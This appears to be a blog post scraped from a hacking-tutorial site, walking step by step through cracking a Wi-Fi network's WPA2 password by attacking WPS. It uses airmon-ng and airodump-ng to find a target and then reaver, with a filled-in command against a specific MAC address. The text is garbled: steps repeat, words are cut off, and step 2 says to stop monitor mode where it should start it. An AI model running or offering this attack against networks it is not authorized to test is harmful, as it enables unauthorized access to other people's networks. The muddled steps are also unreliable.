1. Open our terminal (CTRL+ALT+T) and type airmon-ng (view tips and tricks how to create keyboard shortcut on kali linux) - See more at: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password/#sthash.uZ5dOuMR.fCeUBmxO.dpuf
2. The next step we need to stop our wireless monitor mode by running airmon-ng stop
3. Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 our wireless interface will start capturing the data.
From the picture above, we can see many available access point with all the information. In the green box is our victim access point which is my own access point
4. From the step 3 abovif the WPS Locked status is No, then we ready to crack and move to ste
5. The last step is cracking the WPA2 password using reaver.
3. Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 our wireless interface will start capturing the data.
4. From the step 3 abovif the WPS Locked status is No, then we ready to crack and move to ste
reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360
Because we already get the information from step 3 above, so my command look like this:
reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password/#sthash.uZ5dOuMR.fCeUBmxO.dpuf
No comments:
Post a Comment